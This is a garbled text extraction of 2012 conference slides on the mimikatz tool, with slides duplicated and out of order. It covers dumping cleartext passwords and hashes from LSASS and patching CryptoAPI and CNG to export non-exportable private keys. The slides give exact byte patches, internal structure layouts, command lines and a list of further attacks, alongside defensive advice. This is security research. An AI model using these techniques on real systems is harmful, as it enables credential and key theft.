07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
